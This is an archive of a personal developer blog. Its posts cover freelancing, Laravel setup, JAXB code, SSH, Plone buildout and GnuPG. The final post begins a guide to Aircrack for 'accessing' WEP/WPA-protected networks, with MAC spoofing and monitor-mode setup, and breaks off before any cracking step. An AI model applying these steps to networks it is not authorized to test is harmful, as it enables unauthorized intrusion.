Saturday, December 26, 2015

Ready for freelancing?

I’ve been a professional software/web developer for more than a decade, and up until now I mostly worked as full time employee in several companies and one contracting project as freelancer, where I gained expertise in many technologies and Scrum Master management skills. Latest technologies were mostly web development oriented.

After a decade of my professional life I could say that full time corporate job is right choice if you don't have much experience or you just got out of school. After gaining initial experience in corporate jobs, you will want to make portfolio populated with projects you have worked on. You will need a portfolio to show to future clients that you are right choice for them. Experience proves both client and you that you are capable of finishing projects.

After that you could try yourself working by contract or as freelancer, having flexible working hours, where the end result counts. You need to have self-discipline to work when needed and be reliable and responsible while communicating to clients. This will also help you make time to stay sharp and in step with technology edge, because you are in control of your availability. All this is just what I always wanted so I decided that it is time to dive into freelance world.

In corporate culture, if you think in terms of financial part of software and its price, then of course you would like to finish it ASAP to reduce its cost. Companies driven by that notion only, will often threat its developers as necessary evil. For those companies, it is not the product that is in focus and value it brings to client, but rather the points of contracted work and its unreasonable deadlines.

Often under management pressure to follow deadlines, developers reduce products quality to gain speed. Not the career plan you would like to follow, because you don't have time to improve and work is not fun in such stressed environments.

Then I searched for freelance market sites. And I found sites like UpWork and Elance which are great but they don't guarantee you constant work because first you need to build your reputation and even than you have to compete with some very low unreasonable offers.

If only there could be some intermediate which will connect self-organizing teams of professionals with right customers, willing to pay for good quality product along with reasonable deadlines (so we don't need to compete with immoral offers to jobs like to make a copy of popular social network for 30$, or less, in couple of days). With financial aspect covered, team job is to handle time and quality aspect and gets job done. Team than incrementally develops software and brings value to customer so they together can steer product in right direction.

And then I heard of TopTal while attending presentation with freelancing as topic. It was scheduled at gathering of developer community of Banja Luka. Ines Avdic Zekic from Sarajevo held informative presentation about TopTal. Less than 3% passes screening process, she said. Nobody likes to be tested, but if this is what I have to pass to put financial aspect in background than by all means, let’s do this.

Why join TopTal?

If you pass TopTal screening process, then TopTal stands for you. TopTal takes care of finding jobs and paying you upon completed work, even in such cases where the customer refuses to pay. Take worries about not being paid away, and just commit yourself to finish your job.
Yours is to get job done. Money should be just a side effect of your work.
You can set higher or lower price per hour and frequency of jobs you receive will depend on that. Higher the price per hour, lower frequency of jobs.
It enables you to connect with other freelance professionals and do work together for TopTal trusted customers and companies.
You are not tied to location, as long as you have reliable internet connection.
Market is dictating new technologies, and that technology edge is exactly what you want to learn and contribute in. TopTal enables you to grow as IT professional. It provides you with courses and webinars to learn technologies with highest demand on market. 
It enables you to grow your software using edge technologies to bring better value to its users. You don’t wont to end up in companies just to maintain some piece of software until time and new technologies overrun them.
Availability and commitment can be changed. Your availability varies and you can reduce your availability while you are travelling or on vacation, and also increase it when you are eager to work.
Working 9-5 is not necessary what will bring the most out of developer. I want to use morning hours for work because I'm well rested. Then after lunch I could take a nap, do some physical activities and then go back to work and finish work refreshed and sharp minded.

In Banja Luka, there is still no developers working for TopTal. This would be a great opportunity to make a first step to connect TopTal with talented developers from this region and Banja Luka developer’s community. What I’ve heard so far, convinced me more that TopTal is right fit for me. I’m eager to learn new technologies and improve myself through active communication with TopTal clients and deliver them good piece of useful software. Later on my ambitions would be to gather people around me so we could provide TopTal services in a wide range of technologies as a self-organized team.

Now I'm heading back to Codility for some more practice. TopTal is also providing guide for interviewing PHP developers.

Wish me luck!

Tuesday, July 14, 2015

Simple blog using Laravel - Part I

Migrations

Create articles migration:
$ php artisan make:migration create_articles_table --create="articles"
Inside database/migrations find created migration and edit:
2015_07_13_192755_create_articles_table.php
and add these lines to up() method:
Schema::create('articles', function (Blueprint $table) {
    $table->increments('id');
    $table->string('title');
    $table->text('body');
    $table->text('excerpt')->nullable();
    $table->timestamp('published_at');
    $table->timestamps();
});
To execute created migration do:
$ php artisan migrate

Routes

Edit
app\Http\routes.php
and add this line:
Route::resource('articles', 'ArticlesController');
Which is easier way and equal to manually supply all CRUD routes following REST convention like so:
Route::get('articles', 'ArticlesController@index');
Route::get('articles/create', 'ArticlesController@create');
Route::get('articles/{id}', 'ArticlesController@show');
Route::post('articles', 'ArticlesController@store');
Route::get('articles/{id}/edit', 'ArticlesController@edit');

Model

We have articles table, so lets create Article model:
$ php artisan make:model Article
Edit our model app\Article.php and add $fillable fields so we can mass assign them while creating article. Also specify published_at field inside $dates so Laravel threat this field as Carbon date object instead of simple string representation.
class Article extends Model
{
    protected $dates = ['published_at'];
    protected $fillable = [
    'title',
    'body',
    'published_at'
    ];
}

Add two rows to article table using Laravel interactive tinker tool:
$ php artisan tinker;
$ App\Article::create(['title' => 'My first article', 'body' => 'Article body', 'published_at' => Carbon\Carbon::now()]);
$ App\Article::create(['title' => 'New article', 'body' => 'New body', 'published_at' => Carbon\Carbon::now()]);
$ App\Article::all();
Update first article:
$article = App\Article::find(1);
$article->body = 'Lorem ipsum';
$article->save();
App\Article::all();
Get collection of articles:
$articles = App\Article::where('body','Lorem ipsum')->get();
Get first article:
$article = App\Article::where('body','Lorem ipsum')->first();

Controller

Let's create plain ArticlesController:
$ php artisan make:controller ArticlesController --plain
So now we will create index action to fetch list of articles.
Edit app\Http\Controllers\ArticlesController.php:
public function index()
{
    $articles = Article::latest('published_at')->published()->get();
    return view('articles.index', compact('articles'));
}
We want to use published() scope while fetching articles to get only those published until today and sort them descending from newest to oldest by published_at using latest(). So let's create published() scope in app\Article.php model. Notation is keyword scope followed by scope name, like this:
use Carbon\Carbon;
public function scopePublished($query)
{
    $query->where('published_at', '<=', Carbon::now());
}
To show details of selected article we need show() action. Edit app\Http\Controllers\ArticlesController.php:
public function show($id)
{
    $article = Article::findOrFail($id);
    return view('articles.show', compact('article'));
}

View

Inside resources folder create app.blade.php:
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css">
</head>
<body>
<div class="container">
@yield('content')
</div>
@yield('footer')
</body>
</html>
Inside resources\articles create index.blade.php:
@extends('app')
@section('content')
<div class="col-md-12 staff-header">
<h5>Articles</h5>
</div>
<div class="col-xs-12 col-md-12">
@foreach( $articles as $article)
<article>
<h4>
<a href="{{ action('ArticlesController@show', [$article->id]) }}">{{ $article->title }}</a>
</h4>
<h6>{{ $article->body }}</h6>
<br/>
</article>
@endforeach
</div>
@stop
Inside resources\articles create show.blade.php:
@extends('app')
@section('content')
<div class="col-md-12 staff-header">
<h5>{{ $article->title }}</h5>
</div>
<div class="col-xs-12 col-md-12">
<article>
<h6>{{ $article->body }}</h6>
</article>
</div>
@stop

Tuesday, June 30, 2015

Laravel on Debian Wheezy

LAMP

First we need LAMP packages installed.
Laravel requires PHP >= 5.5.9 so we will install php56.

Add package repositories to apt sources.
Edit sources.list
$ vi /etc/apt/sources.list
and add these two lines:
deb http://packages.dotdeb.org wheezy-php56 all
deb-src http://packages.dotdeb.org wheezy-php56 all

Add dotdeb.gpg key so apt can authenticate packages from added sources.
$ cd
$ wget http://www.dotdeb.org/dotdeb.gpg
$ apt-key add dotdeb.gpg
$ apt-get update

Install Apache, MySQL and PHP
$ apt-get install mysql-server mysql-client
$ apt-get install apache2
$ apt-get install php5 libapache2-mod-php5 php5-mcrypt

Enable rewrite apache modul
$ a2enmod rewrite
$ /etc/init.d/apache2 restart

Confirm that php is working well with apache by creating info.php file:
$ vi /var/www/info.php
add this line:
<?php phpinfo(); ?>
Access inside browser: http://localhost/info.php

Laravel

# To install laravel we need composer:
$ sudo curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer

* Use composer to install laravel:
$ composer global require "laravel/installer=~1.1"

* Add laravel bin to your PATH so you can use laravel executable from any location. Edit bash_profile file:
$ vi ~/.bash_profile
and add these lines:
PATH=$PATH:~/.composer/vendor/bin
export PATH

* Create new base for web application
$ cd ~/NetBeansProjects
$ laravel new LaravelDemo

# Or we could skip installing laravel and using it's executable to create base for web application (steps marked with asterisk *), and go ahead do all that with composer directly:
$ rm -rf ~/NetBeansProjects/LaravelDemo
$ cd ~/NetBeansProjects
$ composer create-project laravel/laravel LaravelDemo --prefer-dist

# Create Apache VirtualHost by:
$ vi /etc/apache2/sites-available/laraveldemo.org
and add these lines:
ServerAdmin webmaster@laraveldemo.org
ServerName  laraveldemo.org
ServerAlias *.laraveldemo.org

DocumentRoot /home/{user}/NetBeansProjects/LaravelDemo/public

        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order allow,deny
        allow from all

ErrorLog ${APACHE_LOG_DIR}/laraveldemo_error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/laraveldemo_access.log combined

# Enable virtual host:
$ a2ensite laraveldemo.org

# Add virtual host to hosts file by editing:
$ vi /etc/hosts
add this line:
127.0.0.1 laraveldemo.org

# Restart apache
$ service apache2 restart

# Create simple /about route and appropriate controller, action and view
$ cd ~/NetBeansProjects/LaravelDemo
$ vi app/Http/routes.php 
add this line to routes.php:
Route::get('about', 'PagesController@about');

# Create PagesController by:
$ php artisan make:controller PagesController --plain
$ vi app/Http/Controllers/PagesController.php
 
add about() method to PagesController.php:
    public function about() {
    return view('about');
    }

# Create about view by editing about.blade.php:
$ vi resouces/views/about.blade.php
add this line:
    Hello World

# Make local configuration
$ copy .env.example to .env

# Generate app key
$ php artisan key:generate

# Set Directory Permissions
$ cd ~/NetBeansProjects/LaravelDemo
$ chgrp www-data -Rv storage/
$ chmod g+w -Rv storage/
$ cd bootstrap/
$ chgrp www-data -Rv cache
$ chmod g+w -Rv cache

Test it by pointing browser to:
http://laraveldemo.org/about

Create database
mysql> create database laraveldemo;
mysql> CREATE USER 'laraveldemouser'@'localhost' IDENTIFIED BY 'laraveldemopass';
mysql> GRANT ALL ON laraveldemo.* TO 'laraveldemouser'@'localhost';

# Add mysql authentication data to .env
$ vi .env
change these lines:
DB_HOST=localhost
DB_DATABASE=laraveldemo
DB_USERNAME=laraveldemouser
DB_PASSWORD=laraveldemopass

Monday, August 9, 2010

How to load/write XML using JAXB?

Every now and then you need to load or write some XML files. It is very effective way to put data in machine-readable form. XML is text format file which is well formatted using standardized rules.

So to demonstrate use of JAXB we will:
1) create XML file with some data (bookmarks.xml)
2) create XML schema file to validate our XML file (bookmarks.xsd)
3) create XML object model using xjc utility (xjc.txt)
4) load that XML file into JAXB object (XMLUnmarshall.java)
5) write JAXB object back over original XML file (XMLMarshaller.java)
6) create main java class to call these functions in appropriate order (JAXBLoader,java)

Create XML file
Lets create a simple xml file for storing bookmark data organized through sets. It will contain root element bookmarks with bookmark elements inside and list of attribute elements for storing href values. Also for every bookmark element there will be a attribute set which will identify current bookmark set. Example of this xml can be found here: bookmarks.xml.

Create XML schema file
To validate bookmark.xml we need to create schema file. Example for this example can be found here: bookmarks.xsd.

Create object model
To create object model for our xml we need to run xjc utility and supply it with xsd schema file as argument at command line.

zlaja@orion:~/NetBeansProjects/JAXBLoader> xjc ./data/bookmarks.xsd -p com.blogspot.zetaorionis.bookmarks.model -d ./src
parsing a schema...
compiling a schema...
com/blogspot/zetaorionis/bookmarks/model/AttributeType.java
com/blogspot/zetaorionis/bookmarks/model/Bookmark.java
com/blogspot/zetaorionis/bookmarks/model/Bookmarks.java
com/blogspot/zetaorionis/bookmarks/model/ObjectFactory.java
com/blogspot/zetaorionis/bookmarks/model/package-info.java
zlaja@orion:~/NetBeansProjects/JAXBLoader>

Unmarshalling / loading XML data to object model instance
This utility class will help you read xml file into it's object representation. It will work with every xml file. You just need to supply it with uri path to xml file:
data/bookmarks.xml

and root element class of object model:
Bookmarks.class

Here is XMLUnmarshaller.java utility class:

package com.blogspot.zetaorionis.util.xml;

import java.io.FileNotFoundException;
import java.io.InputStream;
import java.io.IOException;
import java.net.URI;

import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.transform.stream.StreamSource;

import org.apache.log4j.Logger;

/**
*
* @author zlaja
*/
public class XMLUnmarshaller {

private static final Logger logger = Logger.getLogger(XMLUnmarshaller.class);
/**
* The bookmark file.
*/
protected URI uri;

/**
* Create an xml based loader of bookmarks.
* @param uri the bookmark file
*/
public XMLUnmarshaller(final URI uri) {
this.uri = uri;
}

//
// BookmarksXMLLoader
//
/**
* Load bookmarks into a action list.
*
* @throws IOException
* If an I/O error occurred.
* @throws FileNotFoundException
* If the resource was not found.
*/
public T load(Class docClass) throws IOException {
final InputStream in = getClass().getResourceAsStream("/" + uri.getPath());

if (in == null) {
throw new FileNotFoundException("Cannot find resource: " + uri);
}

try {
return load(docClass, in);
} finally {
in.close();
}
}

protected T load(Class docClass, final InputStream in) {
T o = null;
try {
o = unmarshal(docClass, in);
} catch (JAXBException ex) {
logger.error("Error while unmarshalling.", ex);
}
return o;
}

public T unmarshal(Class docClass, InputStream inputStream)
throws JAXBException {
String packageName = docClass.getPackage().getName();
JAXBContext jc = JAXBContext.newInstance(packageName);
Unmarshaller u = jc.createUnmarshaller();
JAXBElement doc = u.unmarshal(new StreamSource(inputStream), docClass);
return doc.getValue();
}
}

Marshalling / writing data to xml from object model instance
This utility class will help you write data from object representation to xml file. It will work with every xml file. You just need to supply it with uri path to xml file:
data/bookmarks.xml

and root element class of object model:
Bookmarks.class

Here is XMLMarshaller.java utility class:
package com.blogspot.zetaorionis.util.xml;

import java.io.FileNotFoundException;
import java.io.OutputStream;
import java.io.FileOutputStream;
import java.net.URI;
import java.io.IOException;

import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Marshaller;

import org.apache.log4j.Logger;

/**
*
* @author zlaja
*/
public class XMLMarshaller {

private static final Logger logger = Logger.getLogger(XMLUnmarshaller.class);
/**
* The output XML file.
*/
protected URI uri;

/**
* Create an xml based writer for specified jaxbObject.
* @param uri - uri for output XML file
*/
public XMLMarshaller(final URI uri) {
this.uri = uri;
}

//
// XMLMarshaller
//
/**
* Write JAXBElement representation of object to XML file.
*
* @param jaxbObject - object for marshalling to xml, converted to JAXBElement.
* Conversion is done using function inside ObjectFactory.java which is
* created with xjc utility
* @param docClass - class for object that is going to be marshalled to XML
*
* @throws IOException
* If an I/O error occurred.
* @throws FileNotFoundException
* If the resource was not found.
*/
public void write(final JAXBElement jaxbObject, Class docClass) throws IOException {
final OutputStream os = new FileOutputStream(uri.getPath());

if (os == null) {
throw new FileNotFoundException("Cannot create resource: " + uri);
}

try {
write(jaxbObject, docClass, os);
} finally {
os.close();
}
}

protected void write(final JAXBElement jaxbObject, Class docClass, final OutputStream os) {
try {
marshall(jaxbObject, docClass, os);
} catch (JAXBException ex) {
logger.error("Error in marshalling to XML.", ex);
}
}

private void marshall(final JAXBElement jaxbObject, Class docClass, final OutputStream os)
throws JAXBException {
String packageName = docClass.getPackage().getName();
JAXBContext context = JAXBContext.newInstance(packageName);
Marshaller m = context.createMarshaller();
m.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
m.marshal(jaxbObject, os);
}
}

Call utility classes inside main class
package com.blogspot.zetaorionis.jaxbloader;

import com.blogspot.zetaorionis.bookmarks.model.Bookmarks;
import com.blogspot.zetaorionis.bookmarks.model.ObjectFactory;
import com.blogspot.zetaorionis.util.xml.XMLMarshaller;
import com.blogspot.zetaorionis.util.xml.XMLUnmarshaller;
import java.net.URI;
import org.apache.log4j.Logger;

/**
*
* @author zlaja
*/
public class JAXBLoader {

private static final String LOG4J_PROPERTIES = "data/log4j.properties";
private static final Logger logger = Logger.getLogger(JAXBLoader.class);
private Bookmarks bookmarks = new Bookmarks();

public JAXBLoader() {
Log4J.init(LOG4J_PROPERTIES);
}

/**
* Loads XML data to object
*/
private void loadBookmarks() {
try {
final String path = "data/bookmarks.xml";
final URI uri = new URI(path);

final XMLUnmarshaller xmlBookmarks = new XMLUnmarshaller(uri);
this.bookmarks = xmlBookmarks.load(Bookmarks.class);
logger.info("Info: Bookmarks loaded successfuly.");
} catch (Exception ex) {
logger.error("Error: Loading bookmarks XML file failed", ex);
}
}

/**
* Writes object data to XML
*/
private void writeBookmarks() {
try {
final String path = "data/bookmarks.xml";
final URI uri = new URI(path);

final XMLMarshaller xmlBookmarks = new XMLMarshaller(uri);
ObjectFactory of = new ObjectFactory();
xmlBookmarks.write(of.createBookmarks(this.bookmarks), Bookmarks.class);
logger.info("Info: Bookmarks written successfuly.");
} catch (Exception ex) {
logger.error("Error: Writing bookmarks XML file failed", ex);
}
}

/**
* @param args the command line arguments
*/
public static void main(String[] args) {
JAXBLoader loader = new JAXBLoader();
loader.loadBookmarks();
loader.writeBookmarks();
}
}

Saturday, February 20, 2010

Use yubikey for safer and less painful browsing

What is yubikey?
Yubikey is usb powered piece of hardware with one action button to generate OTP (one time passwords).

Main advantages:
- There is no need to remember credentials for different sites on the web. Just plug in the yubikey and press action button which will create random OTP password with unique header number of that particular yubikey.
- It will guarantee user inviolability and thus disable fishing attacks and credential information interception.

Main disadvantages:
- You have to carry it with you :), but you can access your web portals without using it in old fashion way by typing your credentials.

Settings things up:
You need to register your account at KeyGenius:
http://kg.yubico.com/

You can use basic or standard account type. Basic will not ask you for any password when logging and all you need is one touch on your yubikey for every login on the web. You are released of typing. Standard account is more secure. It will ask you on first access for your KeyGenius credentials, and after supplying it you can use yubikey like in basic account for every other portal on the web.

Under your account you need to supply information like username, passsword and domain for every domain and credential information.

So it's like this. You want to login on e.g. facebook.com. You will open facebook in browser. Your username will be remembered by your browser. Instead of typing passwords you plug your yubikey and touch button. Login process will continue automatically. First it will send request to KeyGenius to return real password for facebook and after receiving password browser will log you to facebook.

Browser will need to know how to get password from KeyGenius. That is accomplished with java script which can be installed to browser using GreasyMonkey addon. Script can be found here:
http://kg.yubico.com/keygenius.user.js

And thats it. Enjoy your safe browsing... :)

Database synchronization using TableSyncer

Prerequisites:
ruby
ruby-devel
ruby-mysql
rubygems
libmysqlclient
libmysqlclient-devel
libopenssl-devel
zlib-devel

Installation:
sudo gem install mysql
sudo gem install table_syncer

Settings:
cd /usr/lib64/ruby/gems/1.8/gems/table_syncer-0.3.1/lib
cp table_syncer.rb table_syncer.rb.orig
vi table_syncer.rb

Add and change these lines:
local_source_db = {:host => '127.0.0.1', :user => 'user', :password => 'password', :db => 'SourceDatabase'}
local_test_db = {:host => '127.0.0.1', :user => 'user', :password => 'password', :db => 'test'}

Executing
table_syncer --from=local_source_db --to=local_test_db --tables=account

Reference:
http://code.google.com/p/ruby-roger-useful-functions/wiki/TableSyncer
http://www.freelinuxtutorials.com/quick-tips-and-tricks/sync-mysql-tables-via-ruby-gem-tablesyncer/
http://forums.mysql.com/read.php?116,178217,198518#msg-198518

SCP & SSH

At local machine:
ssh-keygen -t rsa
cd ~/.ssh
cp id_rsa.pub authorized_keys
scp -p ~/.ssh/authorized_keys username@remoteMachine:.ssh/

Note that before executing scp you need to make sure there is ~/.ssh at remote machine also and create it if neccecery with
mkdir ~/.ssh

At remote machine:
cd
ls -ld . .ssh .ssh/authorized_keys
drwxr-xr-x 36 username username 4096 Jul 25 02:24 .
drwxr-xr-x 2 username username 512 Apr 10 02:30 .ssh
-rw-r--r-- 1 username username 1674 Apr 10 02:29 .ssh/authorized_keys

cd
chmod go-w . .ssh .ssh/authorized_keys

At local machine:
scp -p file username@remoteMachine:path/to/file

Reference:
http://kimmo.suominen.com/docs/ssh/

Mounting remote windows station

1) Using mount command:
mount -t cifs //192.168.0.4/Movies ~/Desktop/movies/

2) Using /etc/fstab file:
//192.168.0.4/Movies /media/remote/movies cifs file_mode=0777,dir_mode=0777,password=******** 0 0

Mounting iso file image:
mkdir /media/iso
mount -o loop -t iso9660 ~/file.iso /media/iso

Monday, March 30, 2009

Installing Plone True Gallery

Problem
It should be simple as editing buildout.cfg and runing buildout again.
Edit buildout.cfg with:
$ joe buildout.cfg

Under eggs and zcml sections add collective.plonetruegallery string like:
eggs =
collective.plonetruegallery
...
zcml =
collective.plonetruegallery

Run buildout again with:
$ ./bin/buildout -v

This will give you the error:
Error: Couldn't find a distribution for 'gdata.py>=1.2.3'.

Problem is gdata.py package doesn't exists because it is now known as gdata only.

Solution
$ wget http://pypi.python.org/packages/source/c/collective.plonetruegallery/collective.plonetruegallery-0.6b2.4.tar.gz
$ tar xfz collective.plonetruegallery-0.6b2.4.tar.gz
$ cd collective.plonetruegallery-0.6b2.4
$ joe setup.py
Change gdata.py to gdata under dependency part so it looks like this:
install_requires=[
'setuptools',
'gdata>=1.2.3',
'flickrapi>=1.2',
'simplejson',
'elementtree'
],
$ sudo python2.4 setup.py install
$ joe buildout.cfg

Add zcml slug like:
zcml =
collective.plonetruegallery

Run buildout again with:
$ ./bin/buildout -v

Run your instance with:
$ ./bin/instance fg

Now, it should be under 'add on products' so you can install it.

Sunday, March 29, 2009

Managing projects using buildout

Directories in the buildout
Before we dive into buildout.cfg, let us take a quick look at the directories that buildout has created for us:
bin/

Contains various executables, including the buildout command, and the instance Zope control script.
eggs/

Contains eggs that buildout has downloaded. These will be explicitly activated by the control scripts in the bin/ directory.
downloads/

Contains non-egg downloads, such as the Zope source code archive.
var/

Contains the log files (in var/log/) and the file storage ZODB data (in var/filestorage/Data.fs). Buildout will never overwrite these.
src/

Initially empty. You can place your own development eggs here and reference them in buildout.cfg. More on that later.
products/

This is analogous to a Zope instance's Products/ directory (note the difference in capitalisation). If you are developing any old-style Zope 2 products, place them here. We will see how buildout can automatically download and manage archives of products, but if you want to extract a product dependency manually, or check one out from Subversion, this is the place to do so.
parts/

Contains code and data managed by buildout. In our case, it will include the local Zope installation, a buildout-managed Zope instance, and Plone's source code. In general, you should not modify anything in this directory, as buildout may overwrite your changes.

The main [buildout] section
The [buildout] section is the starting point for the file. It lists a number of "parts", which are configured in separate sections later in the file. Each part has an associated recipe, which is the name of an egg that knows how to perform a particular task, e.g. build Zope or create a Zope instance. A recipe typically takes a few configuration options.

Our global settings are as follows:
[buildout]
parts =
plone
zope2
productdistros
instance
zopepy
find-links =
http://dist.plone.org
http://download.zope.org/ppix/
http://download.zope.org/distribution/
http://effbot.org/downloads
eggs =
elementtree
develop =

This specifies that the parts plone, zope2, productdistros, instance and zopepy will be run, in that order. Then, we tell buildout that it can search one of a number of URLs when it is looking for eggs to download. In addition, it will always search the Cheese Shop.

Next, we can list any eggs that buildout should download and install for us. This may include version specifications. For example, if you want sqlalchemy 0.3, but not 0.4, you could list;
eggs =
elementtree
sqlalchemy>=0.3,<0.4dev

Finally, we can list development eggs, by specifying a directory where the egg is extracted in source format. For example:
eggs =
elementtree
my.package
develop =
src/my.package

This presumes that there is an egg called my.package in the src/ directory. We will learn how to create such eggs a little later in this tutorial. Notice how we must also list my.package as an actual egg dependency: development eggs are not automatically added to the "working set" of eggs that are installed for Zope.

The [plone] section
This is very simple - it just uses plone.recipe.plone to download Plone's products and eggs.
[plone]
recipe = plone.recipe.plone

It will use the latest release available. Version numbers for plone.recipe.plone correspond to version numbers for Plone itself. Therefore, to make sure you always get a 3.0.x release, but not a 3.1, you can do:
[plone]
recipe = plone.recipe.plone>=3.0,<3.1dev

When the recipe is run, Plone's products will be installed in parts/plone. The eggs are made available via buildout variable ${plone:eggs}, which we will reference in the [instance] section later, and the URL of a "known good" version of Zope is available in the variable ${plone:zope2-url}.

The [zope2] section
This part builds Zope 2, using plone.recipe.zope2install. If you specified an existing Zope installation, you will not have this part. Otherwise, it looks like this:
[zope2]
recipe = plone.recipe.zope2install
url = ${plone:zope2-url}

Here, we reference the download location for Zope as emitted by the [plone] part. This ensures that we always get the recommended version of Zope. You could specify a download URL manually instead, if you wanted to use a different version of Zope.

When the recipe is run, Zope 2 is installed in parts/zope2. The Zope software home becomes parts/zope2/lib/python.

The [productdistros] section
This uses the plone.recipe.distros recipe, which is able to download distributions (archives) of Zope 2 style products and make them available to Zope. It is empty to begin with:
[productdistros]
recipe = plone.recipe.distros
urls =
nested-packages =
version-suffix-packages =

However, you can list any number of downloads. The recipe is also able to deal with archives that contain a single top-level directory that contains a bundle of actual product directories (nested-packages), or packages that have a version number in the directory name and thus need to be renamed to get the actual product directory (version-suffix-packages).

Consider the following distributions:

# A typical distribution

ExampleProduct-1.0.tgz
|
|- ExampleProduct
| |
| |- __init__.py
| |- (product code)

# A version suffix distribution

AnotherExampleProduct-2.0.tgz
|
|- AnotherExampleProduct-2.0
| |
| |- __init__.py
| |- (product code)

# A nested package distribution

ExampleProductBundle-1.0.tgz
|
|- ExampleProductBundle
| |
| |- ProductOne
| | |- __init__.py
| | |- (product code)
| |
| |- ProductTwo
| | |- __init__.py
| | |- (product code)

Here is what the part would look like if we try to install the three distributions above:
[productdistros]
recipe = plone.recipe.distros
urls =
http://example.com/dist/ExampleProduct-1.0.tgz
http://example.com/dist/AnotherExampleProduct-2.0.tgz
http://example.com/dist/ExampleProductBundle-1.0.tgz
nested-packages = ExampleProductBundle-1.0.tgz
version-suffix-packages = AnotherExampleProduct-2.0.tgz

You can specify multiple downloads on separate lines. When the recipe is run, the product directories for downloaded products are found in parts/productdistros.

The [instance] section
The instance section pulls it all together: It configures a Zope instance using the plone.recipe.zope2instance script. Here is how it looks:
[instance]
recipe = plone.recipe.zope2instance
zope2-location = ${zope2:location}
user = admin:admin
http-address = 8080
debug-mode = on
verbose-security = on
eggs =
${buildout:eggs}
${plone:eggs}
zcml =
products =
${buildout:directory}/products
${productdistros:location}
${plone:products}

Here, we reference the Zope 2 installation from the [zope2] part - if you specified a location yourself when creating the buildout, you would see that one here. Then, we specify the initial admin user and password, and the port that Zope will be bound to. We also turn on debug mode and verbose security. These options are used to generate an appropraite zope.conf file for this instance. See the recipe page in the Cheese Shop for more details on the options available.

Next, we specify which eggs that will be made available to Zope. This references the "global" eggs from the [buildout] section, as well as the eggs specified by Plone. You could add additional eggs here, though it is generally easier to specify these at the top of the file, so that they get included in the ${buildout:eggs} working set.

As explained previously, Zope 3 configure.zcml files are not loaded automatically for eggs or packages not the Products namespace. To load ZCML files for a regular package, we can make buildout create a ZCML slug by listing the package under the zcml option:
zcml =
my.package
my.package-overrides

This assumes that my.package was previously referenced in the buildout. This would load both the main configure.zcml and the overrides.zcml file from this package.

Finally, we list the various directories that contain Zope 2 style products - akin to the Products/ directory in a traditional instance. Notice how the products/ directory in the main buildout directory comes first, followed by the products downloaded with the [productdistros] part, followed by the products downloaded by the [plone] part. This means that even if Plone ships with a product, you could override it (e.g. with a newer product) by putting a product with the same name in the top-level products/ directory.

When the recipe is run, the Zope instance home will be parts/instance, and a control script is created in ./bin/instance.

The [zopepy] section
This final section creates a Python interpreter that has all the eggs and packages (but not Zope 2 style products) that Zope would have during startup. This can be useful for testing purposes.
[zopepy]
recipe = zc.recipe.egg
eggs = ${instance:eggs}
interpreter = zopepy
extra-paths = ${zope2:location}/lib/python
scripts = zopepy

Here, we copy the eggs from the [instance] section, and include in the pythonpath the Zope instance home.

When the recipe is run, the script will be created in ./bin/zopepy.

Managing ZCML files
It is important to realize that Zope will not load configure.zcml files automatically for packages that are not in the Products.* namespace. Instead, you must explicitly reference the package. Buildout can create such a reference (known as a ZCML slug) with the zcml option under the [instance] part. Here is how to ensure that borg.project is available to Zope:
[buildout]
...
eggs =
elementtree
borg.project
...
[instance]
...
zcml =
borg.project

Should you need to load an overrides.zcml or a meta.zcml, you can use a syntax like:
zcml =
some.package
some.package-overrides
some.package-meta


Resources:
http://plone.org/documentation/tutorial/buildout/tutorial-all-pages

Wednesday, March 25, 2009

GnuPG

Create your public and private keys
In case you do not have '.gnupg' direcotry under your Home directory, create it with:
$ mkdir .gnupg

and set up permissions with:
$ chmod 700 .gnupg

Then generate keys with:
$ gpg --gen-key

Choose key type, key length and key expiration.
Then enter your 'User-ID' which consists of 'Name Surname', 'e-mail' and 'comment'.
Then enter your password for using keys.

To publish your public ID:
$ gpg --keyserver pgp.mit.edu --send-keys [e-mail]

Backing up your secret key
This will list keys on your secret keyring:
$ gpg --list-secret-keys

To make backup use:
$ gpg --output [outfile] --armor --export-secret-key [key_identifier as gleaned from above]

This will list keys on your public keyring:
$ gpg --list-keys

To make backup use:
$ gpg --output [outfile] --armor --export [key_identifier as gleaned from above]

key_identifier is usually in the form of something like: ABCDFE01

Depending on your host, you could also just copy the entire .gpg directory if you wanted to do it that way also.

Of course there is the paperkey utility if you need to make a paperkey backup of your secret key:
http://www.jabberwocky.com/software/paperkey/

Evolution integration
At security tab in settings dialog of your email account enter your key identifier.
You can find it by listing keys with:
$ gpg --list-keys

Search for eight characters where now stands 'XXXXXXXX'
pub 1024D/XXXXXXXX 2004-01-01 Name Surname (comment) [email]

Friday, March 20, 2009

Testing WEP and WPA protection

Aircrack is one of the easiest software bundles which let's you to access wireless protected networks. I have laptop HP Pavilion dv6500 with Intel PRO/Wireless 3945ABG [Golan] Network Connection wireless card. I'm using openSUSE 11.1 64bit as OS with kernel 2.6.27.19-3.2-default.

Wireless card features
* Chipset: Intel WM3945AG
* IEEE Standards: 802.11a, 802.11b, 802.11g
* PCI ID: 8086:4227

Prerequisites
* gcc
* libopenssl-devel
* sqlite3-devel >=3.6.10
* iw
* http://trac.aircrack-ng.org/attachment/ticket/572/sha-compile-fix-64bit.patch

Installation
$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc2.tar.gz
$ tar -zxvf aircrack-ng-1.0-rc2.tar.gz
$ cd aircrack-ng-1.0-rc2
Patch source file sha1-sse2.S using instructions in sha-compile-fix-64bit.patch
$ make SQLITE=true
$ sudo make SQLITE=true install

Using airmon-ng
Stop previously started monitoring:
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng stop mon0

Change MAC of your wlan interface
$ sudo ifconfig wlan0 down
$ sudo macchanger -A wlan0
$ sudo ifconfig wlan0 up
$ ifconfig

Create additional wireless interface mon0 in monitor mode
$ sudo airmon-ng start wlan0
